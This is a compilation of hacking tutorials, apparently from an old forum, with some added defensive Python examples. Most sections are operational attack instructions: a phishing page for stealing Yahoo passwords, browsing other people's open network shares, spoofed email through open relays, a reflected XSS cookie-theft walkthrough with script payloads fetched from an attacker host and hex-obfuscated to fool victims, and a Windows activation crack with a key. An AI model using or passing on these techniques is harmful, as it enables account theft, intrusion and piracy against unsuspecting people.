Shared resources at \\192.168.0.99

850

Share name   Type    Used as   Comment
-------------------------------------
C:\          Disk
cd-rom       Disk
GAMES (D)    Disk
Printer      Print             HP DeskJet 692C
SharedDocs   Disk
```

So now that you have found out the names of the shares, time to start looking inside them. There are two ways to do this:

1 - Type the ip into your browser [internet explorer] like so: \\ip address
2 - Type net use x: \\ipaddress\sharename [example: net use c: \\123.123.123.123\c]

The second command is good because you can view the shares in dos, thus speeding up the load time. What it does is map the c drive of the remote host to a local drive, in this case x:, on your computer, so just type x: into your shell [command prompt, ms-dos] and browse just like it was your c drive.
Steal Yahoo ID

Many of us want to mess with our friends and get the passwords of their yahoo accounts. The easiest method to do this is send them a greeting card to a fake login page; i have created a fake login page at http://www.greetingscards.cjb.net. All you have to do is:

1) Get the source html code of it in a notepad. If you don't know how to do that, open www.greetingscards.cjb.net, then click on edit with notepad; the html codes opened in notepad are the html codes you will be putting on your website.
2) After you have got the source codes, find the email id e-mail_here@yahoo.com in it.
3) Replace the e-mail_here in [my id] with your victim's id; this will be the id you want your friends'/enemies' passwords sent to.
4) Make your webpage by copy-pasting these html codes on your website [preferably on geocities, because it's free; use the page builder option, in that use the insert forms and script, html option and paste the html codes, then launch your site].
5) E-mail your friend this format:

viewing your e-card is a snap, Just choose from the following options: Click on the following link: http://www.your-site.com, or Copy and paste the above link into your web browser's address window and Enter this e-card number, 622686767495, on our e-card pick up page at: http://www.your-site.com We hope you enjoy your e-card, if you have any comments or questions, please visit http://www.your-site.com Thanks for using Yahoo! Greetings with http://www.your-site.com
Using Telnet

1 - Why This Tutor

Most of you only know that telnet is a port [port 23] or that telnet is a remote control tool. Remote control means in this aspect that you as client can get a connection to, for example, a telnet server, and then you can write commands in a derivative of a shell, and these commands are executed only on this server, not on your machine. But i want to show all you guys how to use this simple remote control tool in several ways, because this simpleness is brilliant. So hope i answered this question, and if you are interested go on and read; if not, stop reading and go pissing.

2 - How To Use Telnet

Telnet is a text based tool, so if you want to connect to the destination [128.62.254.12] write: 'telnet 128.62.254.12 23'. So you see at first there is the command telnet to start the telnet client, the next is the destination address and last is the port, you know, the telnet port 23. So i hope now you can use telnet.

3 - How To Send Anonymous Mails

3-1 - SMTP

Yes, first i have to say something about the smtp [simple mail transfer protocol]. The standard is written down in the rfc 821 [rfc = request for comments]; it goes back to the year 1982. This rfc defines the commands which could be used. These commands:

1 - HELO [client address or name], it marks the begin of that telnet session and sends your name or address to the smtp server
2 - MAIL FROM [your mail addie], with this command you send your mail addie to the server; it is also written in the e-mail as sender
3 - RCPT TO [recipient], with this command you define the recipient
4 - DATA, this marks the beginning of the e-mail; if the server sends an ack [acknowledge] you can begin to write the message
5 - RSET, reset: this establishes the initial stage and the connection is canceled
6 - NOOP, no operation, so it means that nothing is done
7 - QUIT, this is the ending of the smtp connection

But these are only the most important commands; many commands have been added in the time after the rfc defined them:

EXPN, expand: with this command maillist support will be available
VRFY, verify: this command requests the confirmation of the recipient address

Because of this addition the smtp is also called esmtp, which means Extended smtp.

3-2 How To Use SMTP To Send Anonymous Mails

First you have to find a freely accessible smtp server. Because of spamming, many servers have secured their systems, like gmx with [smtp after pop], which means that at first you have to login at pop with your username and password for your gmx email addie; after that the server saves your ip for a special time in which you can connect to the smtp server to send mails. Freenet uses another secured system: this smtp server denies special recipient addies. So you have to search a freely accessible mail server without such secured servers; they exist. So after you have found such a server you can write in your shell: [telnet <serveraddy> 25], then your client connects to it. Here is a complete telnet session:

```
Connected to mail.gmx.net.
220 {mp015-rz3} GMX Mailservices ESMTP
HELO www.The-Netrix.net
250 {mp015-rz3} GMX Mailservices
MAIL FROM:LinusTorvalds@linux.org
250 ... Sender Okay
RCPT TO:BillGates@microsoft.com
250 ... Recipient Okay
DATA
354 Enter mail, end with "." on a line by itself
Operating Systems are like sex, you have the best if it is free
.
250 Mail accepted
QUIT
221 mail.gmx.net closing connection
Connection closed by foreign host.
```
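What separates the "freely accessible" server the session above relies on from the locked-down ones the tutorial complains about is one check on the receiving side. This added example (not code from the tutorial) models that side: a small state machine for the RFC 821 commands listed above that accepts mail for its own domains from anyone but relays elsewhere only when the client IP authenticated to POP recently, the "SMTP after POP" scheme mentioned above. The hostname mx.example.net, the local domain example.net and the client IP addresses are assumed values.

```python
"""Receiving side of an SMTP exchange: envelope state machine with relay control.
Added example, not code from the tutorial; hostname, local domain and client
IP addresses are assumed values."""
import re

COMMAND_RE = re.compile(
    r"^\s*(HELO|MAIL FROM|RCPT TO|DATA|RSET|NOOP|QUIT)\b:?\s*(.*?)\s*$", re.IGNORECASE)


class RelayPolicy:
    """Local domains: always. Elsewhere: only for clients that did "SMTP after POP"."""

    def __init__(self, local_domains, pop_logins, now, window=900):
        self.local_domains = {d.lower() for d in local_domains}
        self.pop_logins = pop_logins      # client IP -> time of last successful POP login
        self.now = now                    # current time, injected so the check is testable
        self.window = window              # seconds a POP login keeps relaying open

    def may_relay_from(self, client_ip):
        seen = self.pop_logins.get(client_ip)
        return seen is not None and 0 <= self.now - seen <= self.window


class SmtpSession:
    """Feed one client line at a time; returns the reply, or None while collecting DATA."""

    def __init__(self, policy, client_ip, hostname="mx.example.net"):
        self.policy, self.client_ip, self.hostname = policy, client_ip, hostname
        self.helo = None
        self.messages = []                # accepted (sender, recipients, body) tuples
        self._reset_envelope()

    def _reset_envelope(self):
        self.sender, self.recipients, self.in_data, self._body = None, [], False, []

    def handle(self, line):
        if self.in_data:
            return self._data_line(line)
        m = COMMAND_RE.match(line)
        if not m:
            return "500 Syntax error, command unrecognized"
        verb, arg = m.group(1).upper(), m.group(2).strip("<>")
        if verb == "HELO":
            if not arg:
                return "501 Syntax error in parameters"
            self.helo = arg
            self._reset_envelope()
            return f"250 {self.hostname}"
        if verb == "NOOP":
            return "250 OK"
        if verb == "RSET":
            self._reset_envelope()
            return "250 OK"
        if verb == "QUIT":
            return f"221 {self.hostname} closing connection"
        if self.helo is None:
            return "503 Bad sequence of commands: send HELO first"
        if verb == "MAIL FROM":
            if self.sender is not None:
                return "503 Sender already specified"
            if "@" not in arg:
                return "501 Syntax error in sender address"
            self.sender = arg             # never verified, which is why spoofed senders work
            return "250 Sender Okay"
        if verb == "RCPT TO":
            if self.sender is None:
                return "503 Need MAIL FROM before RCPT TO"
            if "@" not in arg:
                return "501 Syntax error in recipient address"
            domain = arg.rsplit("@", 1)[1].lower()
            if domain not in self.policy.local_domains and not self.policy.may_relay_from(self.client_ip):
                return "550 Relaying denied"   # the check an open relay is missing
            self.recipients.append(arg)
            return "250 Recipient Okay"
        if not self.recipients:               # verb is DATA
            return "503 Need RCPT TO before DATA"
        self.in_data = True
        return '354 Enter mail, end with "." on a line by itself'

    def _data_line(self, line):
        if line == ".":
            self.messages.append((self.sender, list(self.recipients), "\n".join(self._body)))
            self._reset_envelope()
            return "250 Mail accepted"
        self._body.append(line[1:] if line.startswith("..") else line)   # dot-unstuffing
        return None


def replay(lines, policy, client_ip):
    """Run a client transcript through a session; return it with the non-None replies."""
    session = SmtpSession(policy, client_ip)
    replies = [session.handle(line) for line in lines]
    return session, [r for r in replies if r is not None]


if __name__ == "__main__":
    # Constructed: 203.0.113.5 logged in to POP 200 s ago, 198.51.100.7 never did.
    policy = RelayPolicy({"example.net"}, {"203.0.113.5": 1000}, now=1200)
    script = ["HELO client.example.org", "MAIL FROM:someone@example.org",
              "RCPT TO:someone-else@example.com", "DATA", "hello", ".", "QUIT"]
    for ip in ("198.51.100.7", "203.0.113.5"):
        print(ip, replay(script, policy, ip)[1])
```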
First your client tries to connect to the mail server; as a sign that the connection is established the server answers with a command like that. Then you say hello to the server with the command [HELO] and your machine's name; next is another answer from the server which is unimportant. After it you send your mail addy to the server with the command [MAIL FROM:] followed by your addy; then the server checks this addy and if it's ok he will inform you about it. Next he expects the recipient, and you won't let him wait: the command [RCPT TO:] followed by the addy of the recipient. If it's also ok you can start to write your mail after the command [DATA], which is followed by the ack of the server and the text or character which marks the end of the mail. Then you write your mail and end it how the server expects it; if the mail is ok the server will inform you for the last time in this session. After it there is no cause which should hold your connection, so you will end it with [QUIT] and the server will send a last stupid message as a sign that the connection is closed.

4 - How To Use Telnet In Several Aspects

4-1 - How To Delete Files Of A Website

There is a way to delete files of a website with the help of the http [hyper text transfer protocol], but this security hole is mostly closed; this hole is caused by stupid administrators which can't configure their apache or iis or any other http server.

4-1-1 - HTTP

The http exists since 1990; before this time the internet was used to make a file exchange with the ftp or to get in mailboxes where you can write messages, or many other things. With the http and html [hyper text markup language] the www clients like netscape or ie can interpret this hyper text to display information or other things like you know. But what the user can't see when he uses such a client is that the http also follows the request/answer play: the client requests information with a special command, which i will explain beside others later, and the http server answers with the requested information. These requests or answers are http messages which could be simple_request or simple_response or full_request or full_response; the simple http messages are based on http/0.9 and the full messages on http/1.0, but the difference between these messages is very small, except the one of html/0.9 and html/1.0.

1 - get [address], the address is the whole, like http://www.destination.com/index.html; this command requests the information [the code] in this file, and if the file is a cgi it has to be executed and the produced information will be sent to the client. The difference between this simple_request and the full_request is that the full_request ends with http/1.0, like this: [get http://www.destination.com/index.html http/1.0]
2 - head [addy], it has to be a complete addy too; the small difference between this command and the get command is that this command only gets the meta tags and the other information in the title tag
3 - post [addy], this is used for bigger data; it is mostly used for data which has to be sent to a program
4 - put [addy], with put you send data to the server, like html documents, and this data is saved under the addy
5 - delete [addy], this is the opposite of put, so it deletes the data which you have specified with the addy

4-1 - How To Delete Files Of A Website

With your instinct you have discovered that there is a security hole. The http protocol today is used in combination with the ftp, so that means ftp is used by webmasters to upload their files and http is used by the client to resolve these sites. But in former times, concretely at the development of the http, the developers aimed to make it easier to upload files, so not with the ftp, and that means without a special ftp client; so they created a command to upload and delete files on a webserver. But the problem is that the http didn't use an authentication but ftp does, so that means that most administrators disabled these commands to shut a security hole. But there are not only experienced admins out there but stupid too, so there is still such a hole which waits to be used. However, telnet is an excellent simple tool, so if you want to use this security hole connect to the destination hostname or ip [you can use a hostname because dns will be used to resolve the ip] on port 80; i have showed you guys how to do it. When the connection is established you can use the commands which are described in section 4-1-1.

Well, what is a xss attack? Well, this is the art of running scripts in your victim's pc; you can almost run any script in their browser with the right knowledge. Most ideas: xss is used for stealing cookies. The cookies are bits of information used by web servers / web sites to check who you are on that site. If you're a guest it will set a cookie saying you're a guest; when you login it will replace that cookie with your cookie that you logged in with, that will have your login id, sometimes, if it's a forum, your password encrypted in md5 hash, and other stuff that the site can think of using to make sure you are who you say you are, like session id's that expire after a time limit that the server sets, like 10 mins or 60 mins. Well, in the cookie it has sections that are named, so when the server checks who you are it will read bits of data like the ID and the md5 hash if it's a forum. Most of the time a forum will be using the cookie prefix as default, like nukeevo_ID and so on, but the forum admin can change that.
What's a user id? Well, if you are the first to sign up to a forum your id will be ONE because you will be the first in the sql table... i will talk about the sql tables later. The admin account is nearly almost all the time ID 1 or 2 because of course he would have had to make the account first to config the forum. Now when looking for this type of attack there are ways of looking for this type of attack. First, getting the hacker's point of view of this is to run that script no matter what, looking at every way he or she can find. On myspace they were using flash files, not to steal cookies (because myspace filters javascript) but instead redirecting to a fake login page; the files for this can be found in downloads.
That was using .swf files, but the newest one for myspace is using .mov files; this is using quicktime files to get a url that would be to your fake login. A good FREE server to host to run php files is www.php1h.com; you would upload your cookie stealing scripts on that server so you can send the user's cookie to that site and view it in the log.

Ok, how you could set it up would be:

http://evilhacker.php1h.com/cookiestealer.php = this is the backbone, it takes the cookie from the javascript we run called XSS.js
http://evilhacker.php1h.com/log.php = this is the log where the cookie will be sent after cookiestealer has sent it to the log
www.evilhacker.php1h.com/xss.js = this is the javascript that gives the cookie to cookiestealer.php
: finding xss attacks :

Well, the first way will be viewing the site and looking around for any input boxes and then viewing the source of that site for the name of the input box we find a xss exploit in. When looking for a xss you need to make sure that you look at the url in the URL bar, and you might see stuff that looks like www.site.com/blah.html or .php or .cfm or .jsp. Make sure it has the full url, and if it has stuff after a ? mark add it at the end of the url like this by using a &: www.site.com/page.php?MID=2&(NAME_OF_INPUT_BOX)=(script). So if the input box was called milk for some reason, i dunno why, but just for this tut let's say that, and that the script will just print the words Xss on screen:
www.site.com/page.php?MID=2&MILK="><script>alert("Xss")</script>
There is "> because it tells the input box to stop reading there, and then it runs the javascript. And if the input box was called cat it would look like this:
www.site.com/page.php?MID=2&cat="><script>alert("Xss")</script>
So go round a site looking for any type of input boxes; sometimes i find if a site has "send to a friend", that email box sometimes works.

After you found it, like you get a pop up with the words Xss in it, then you will view source and look for the words Xss in an input box. The basic syntax for how it will look is:

<input type="hidden" name="milk" value="" />

You see, and from there you will make the url which i will talk about at the end. So after finding a xss and you're able to run it in your browser, you want to start running the cookie grabbing scripts in your browser; they will look like this:
www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script>
If you sent someone that link in an email or on msn it would run in their browser to execute that javascript to steal their cookies from site.com, so if you found a xss in msn.com you would have the cookies from msn.com.
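Added example, not from the tutorial: the reflected hidden-input pattern described above, first as written (the query value is pasted straight into the attribute, so the tutorial's `">` closes it) and then with output escaping, which is the fix; it also includes a small check for the plain and hex-encoded probe shapes in request URLs and the cookie attributes that keep a script from reading the session cookie. The page and parameter names are the tutorial's placeholders; `attacker.example` in the test is a constructed host.

```python
"""Reflected hidden-input field: vulnerable rendering, escaped rendering, a request
filter and the cookie flags that blunt cookie theft. Added example, not the
tutorial's code; page and parameter names are placeholders."""
import html
from urllib.parse import parse_qs, unquote, urlsplit

PROBE = '"><script>alert("Xss")</script>'  # the probe string the tutorial uses


def render_hidden_vulnerable(name, value):
    """The bug: the query value is pasted into the attribute unescaped."""
    return f'<input type="hidden" name="{name}" value="{value}" />'


def render_hidden_escaped(name, value):
    """The fix: html.escape with quote=True rewrites " < > & so the value can neither
    close the attribute nor open a new tag."""
    return (f'<input type="hidden" name="{html.escape(name, quote=True)}" '
            f'value="{html.escape(value, quote=True)}" />')


def breaks_out(rendered):
    """True if a script element ended up outside the attribute value."""
    return "<script" in rendered.lower()


def looks_like_xss_probe(url):
    """Flag request URLs whose query values carry markup, including the %22%3E%3C form."""
    for values in parse_qs(urlsplit(url).query, keep_blank_values=True).values():
        for v in values:
            # parse_qs already decoded once; decode again to catch double-encoded input
            decoded = unquote(v).lower()
            if "<script" in decoded or '"><' in decoded or "javascript:" in decoded:
                return True
    return False


def session_cookie_header(session_id):
    """HttpOnly keeps document.cookie from exposing the session id; Secure and
    SameSite limit where the browser sends it."""
    return f"Set-Cookie: sid={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    print(render_hidden_vulnerable("milk", PROBE))
    print(render_hidden_escaped("milk", PROBE))
    print(looks_like_xss_probe("http://www.site.com/page.php?MID=2&MILK=" + PROBE))
```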
But you might ask yourself, how do i swap my cookies? Well, if you are using firefox there is an add-on you can install called cookie editor and then you can edit your cookies, or using IE i'm sure you can edit them in internet temp files or something, but your best bet is FF (firefox). Just remember when you steal the cookies they all won't be one long string; they should be broken up into names like UID, others... out there, but you will just have to work that out for yourself.

Sending the link to a victim can be hard work sometimes. If someone sent you a link that looked like this: www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script>

i wouldn't click it.

But :P if you encrypted some of the words in that url into hex like this, using this table: [img]http://62.31.49.95/asciifull.gif[/img] you could encrypt it to look something like this:

%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E = is the script encoded in hex. Would you click that instead? And to send it through msn you might want to add another & at the end and fill it with shit like www.site.com/page.php?MID=2&MILK=%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E&mk=12 < that would just make it think it needs to include the link, the full of it. There are other ways, like using .gif images to run the script on the site, but that's another story.

Well, that's it for now, hope you enjoyed the read. VOl :v60-hackers:
:info: i have set up some cookie jars for the people too lazy:

http://v60.php1h.com/cookiejar/xss.js
http://v60.php1h.com/cookiejar/log.php

happy hijacking

Vista Activation Crack:
Browse to the Windows\System32\Licensing\pkeyconfig folder, right-click 'pkeyconfig.xrm-ms' and open Properties, click Security > Advanced > Owner > Edit > Administrators. Click OK and close the properties.
Then re-open properties of the file, Click Security > Advanced > Edit > select Administrators and click Edit. Click "Full Control", Click OK and close the properties.
Reboot into safe mode
Replace 'pkeyconfig.xrm-ms' using the one in this package.
Go to Start > Run > type "services.msc" and find "Software Licensing". Normally this ain't running, but if it is you need to stop it with the stop button above.
Go to Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareLicensing and replace the tokens.dat there with the one from this package.
Reboot into normal mode again.
Go to Start > Help & Support > type "Activate" in the search menu. Click on the third topic "Activate Windows on this Computer"
This will start Windows Activation. You can use almost any key here; if you have gotten a Beta1/Beta2/RC1/RC2 key from Microsoft, you could best use that one for it. If you don't have a key, use this one:
H7RPG-XDMJM-WTY9D-VYJ3C-CB3KJ

Virus removal:

Just open your Notepad and type the below code, save it as sajal.bat, put it on your desktop and run it. (The two registry key names that were broken across lines in the scan, NOHIDDEN and SHOWALL, are joined back together here.)

```batch
cd\
del /a /f /s VirusRemoval.vbs
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /f /d "%windir%\system32\userinit.exe",
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f /d "explorer.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v Hidden /f /d 00000002
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v ShowSuperHidden /f /d 00000001
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v SuperHidden /f /d 00000000
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /t Reg_dword /v CheckedValue /f /d 00000002
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /t Reg_dword /v DefaultValue /f /d 00000002
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /t Reg_dword /v CheckedValue /f /d 00000001
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /t Reg_dword /v DefaultValue /f /d 00000002
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v CheckedValue /f /d 00000000
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v DefaultValue /f /d 00000000
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v UncheckedValue /f /d 00000001
reg add "HKLM\Software\Policies\Microsoft\Windows\Installer" /t Reg_dword /v DisableMSI /f /d 0
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /t Reg_dword /v DisableCMD /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableCMD /f /d 0
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableConfig /f /d 0
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableSR /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_Binary /v NoDriveAutoRun /f /d ffffff03
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoDriveTypeAutoRun /f /d 36
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoRun /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\UnreadMail" /t Reg_dword /v MessageExpiryDays /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0
```

What is the Registry?

The Registry is a database used to store settings and options for the 32-bit versions of Microsoft Windows, including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to Control Panel settings, File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.
Power Of Hacking The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained seperately in the %SystemRoot%\System32\Config directory. You can not edit these files directly, you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article). The Structure of The Registry The Registry has a hierarchal structure, although it looks complicated the structure is similar to the directory structure on your hard disk, with Regedit being similar to Windows Explorer. Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contains Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values; String, Binary, and DWORD - the use of these depends upon the context. There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:
* HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface. * HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings. * HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC, this information is used for all users who log onto this computer. * HKEY_USERS - This branch contains individual preferences for each user of the computer, each user is represented by a SID sub-key located under the main branch. * HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration. * HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use with the Plug-&-Play features of Windows, this section is dymanic and will change as devices are added and removed from the system.
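The reg add lines above reset two policy values that lock users out of the Registry Editor and Task Manager. The following is an added example, not code from this page: a small Python parser for the text that `reg query <key>` prints, plus an audit that reports which lockout policies are currently set to 1 and the `reg add` lines that would reset them. The sample output embedded in the block is constructed (the values are hypothetical), so the block runs without Windows; on a real machine you would capture the key with `reg query ... > policies.txt` and feed that file to `parse_reg_query()`.

```python
r"""Audit Windows Registry policy values from saved `reg query` output.

Added example for the Registry section; not code from the page. It parses
the text that `reg query <key>` prints, so it needs no Windows API. Capture
the real output with, for instance:
  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" > policies.txt
and pass the file contents to parse_reg_query().
"""
import re
from typing import Dict, List, Tuple

# Constructed sample of `reg query` output for two keys; the values are
# hypothetical and chosen to exercise both the policy and the thumbnail key.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
    DisableTaskMgr    REG_DWORD    0x1
    DisableRegistryTools    REG_DWORD    0x0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
    DisableThumbnailCache    REG_DWORD    0x1
    Hidden    REG_DWORD    0x2
    LastVisitedPidlMRU    REG_SZ    C:\Users\user\Documents
"""

# Value lines are indented: <name>  <REG_TYPE>  <data>, separated by runs of spaces.
VALUE_RE = re.compile(r"^\s+(\S+)\s{2,}(REG_[A-Z_]+)\s{2,}(.*)$")

# Policies that lock users out of admin tools when set to 1 (the reg add
# lines above reset them to 0). Malware and pranks set them; a value of 1
# that no administrator configured deserves a look.
LOCKOUT_POLICIES = {
    r"Software\Microsoft\Windows\CurrentVersion\Policies\System":
        ("DisableTaskMgr", "DisableRegistryTools"),
}


def parse_reg_query(text: str) -> Dict[str, Dict[str, Tuple[str, object]]]:
    """Return {key_path: {value_name: (reg_type, data)}}; DWORDs become int."""
    keys: Dict[str, Dict[str, Tuple[str, object]]] = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("HKEY_"):          # key header: full path, no indent
            current = line.strip()
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, rtype, data = m.groups()
            data = data.strip()
            if rtype == "REG_DWORD":
                data = int(data, 16)          # reg query prints DWORDs as 0x..
            keys[current][name] = (rtype, data)
    return keys


def audit_lockout_policies(keys) -> List[Tuple[str, str]]:
    """(key_path, value_name) for every lockout policy currently set to 1."""
    hits = []
    for key_path, values in keys.items():
        for suffix, names in LOCKOUT_POLICIES.items():
            if not key_path.lower().endswith(suffix.lower()):
                continue
            for name in names:
                rtype, data = values.get(name, ("REG_DWORD", 0))
                if rtype == "REG_DWORD" and data == 1:
                    hits.append((key_path, name))
    return hits


def remediation_commands(hits) -> List[str]:
    """The reg add lines that undo each hit, in the same form as those above."""
    return [f'reg add "{key}" /v {name} /t REG_DWORD /d 0 /f' for key, name in hits]


if __name__ == "__main__":
    parsed = parse_reg_query(SAMPLE_REG_QUERY)
    for key, name in audit_lockout_policies(parsed):
        print(f"{key}\\{name} is set to 1")
    print("\n".join(remediation_commands(audit_lockout_policies(parsed))))
```

The parser keeps the hive-to-key-to-value hierarchy described above as nested dictionaries, so the same structure can be walked for any other value (the DisableThumbnailCache value in the sample is parsed the same way). Both HKCU and HKLM copies of the policy key are covered because the audit matches on the key's suffix.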
YAHOO USER DETECTION: WHETHER THE VICTIM IS ONLINE OR INVISIBLE

NOTE: THESE ARE ONLINE SITES; NO NEED TO INSTALL ANYTHING
www.imvisible.info
www.scanyahoo.com
www.xeeber.com
www.invisible-scanner.com/
www.invisible.ir
www.detectinvisible.com
www.ydetector.com

YOU CAN ALSO USE A SOFTWARE NAMED "BUDDY SPY". NOTE: THIS SOFTWARE HAS TO BE INSTALLED; JUST DOWNLOAD IT FROM THE GIVEN LINK
www.buddy-spy.com/

ElcomSoft Password Recovery Studio Tools: All ElcomSoft password recovery tools in one package
Proactive Windows Security Explorer 1.0.0.1
Advanced ZIP Password Recovery 3.54
Advanced RAR Password Recovery 1.51
Advanced Archive Password Recovery 2.20
Advanced Office Password Recovery Professional 3.02
Advanced Office Password Breaker 1.30
Advanced PDF Password Recovery 1.48
Advanced PDF Password Recovery Professional 2.20
Advanced WP Office Password Recovery 1.20
Advanced Lotus Password Recovery 2.0
Advanced Intuit Password Recovery 1.33
Advanced ACT Password Recovery 1.21
Advanced Mailbox Password Recovery 1.7.0.198
Advanced Instant Messengers Password Recovery 2.50
Advanced Access Password Recovery 2.5
Advanced VBA Password Recovery Professional 1.50
Advanced Outlook Password Recovery 1.33
Advanced Outlook Express Password Recovery 1.20
Advanced IE Password Recovery 1.20
Advanced EFS Data Recovery 2.10
Advanced Windows Password Recovery 2.9.1.224
Advanced Disk Catalog 1.51
Advanced eBook Inscriber 1.0.0.1
Advanced eBook Explorer 1.1
Advanced eBook Processor 2.2
Advanced Registry Tracer v1.67 SR2
Developer website: http://www.elcomsoft.com

XP Tips & Tricks: Program/Utility: command
Display Properties (w/Appearance Tab Preselected): control color
Dr. Watson System Troubleshooting Utility: drwtsn32
Driver Verifier Utility: verifier
Event Viewer: eventvwr.msc
File Signature Verification Tool: sigverif
Findfast: findfast.cpl
Folders Properties: control folders
Fonts: control fonts
Fonts Folder: fonts
Game Controllers: joy.cpl
Group Policy Editor (XP Pro only): gpedit.msc
Iexpress Wizard: iexpress
Indexing Service: ciadv.msc
Internet Properties: inetcpl.cpl
IP Configuration (Display Connection Configuration): ipconfig /all
IP Configuration (Display DNS Cache Contents): ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents): ipconfig /flushdns
IP Configuration (Release All Connections): ipconfig /release
IP Configuration (Renew All Connections): ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS): ipconfig /registerdns
IP Configuration (Display DHCP Class ID): ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID): ipconfig /setclassid
Java Control Panel (If Installed): jpicpl32.cpl
Java Control Panel (If Installed): javaws

HOW TO SECURE YOUR WIRELESS NETWORK: Here are 5 quick steps to help you secure your wireless network from unauthorized access. These steps are provided as general guidelines - for detailed help, please contact your hardware vendor. See the bottom of this page for links to some common wireless networking vendors.
1. Download the latest firmware for your device.
2. Change the administrator password.
3. Change your SSID and turn off SSID Broadcasting
4. Enable WPA
5. Limit access by MAC addresses

1. Download the latest firmware for your wireless router.
Firmware is software that's embedded in a hardware device - in this case, your wireless router. The firmware that comes with your wireless router or wireless access point may be out of date. Download the latest firmware to ensure the best security and performance. As security vulnerabilities are discovered, patches to stop them are developed. These patches are often included in firmware updates. If you're using the default firmware that came with your wireless router, there could be several known security holes that could allow someone to hijack your Internet connection, view the files on each of your networked computers and even steal passwords or credit card numbers. Most of today's wireless routers allow for firmware updates, and the process is quite simple. Check the web site of your wireless device manufacturer for instructions on obtaining the latest firmware and how to install it.

2. Change the administrator password.
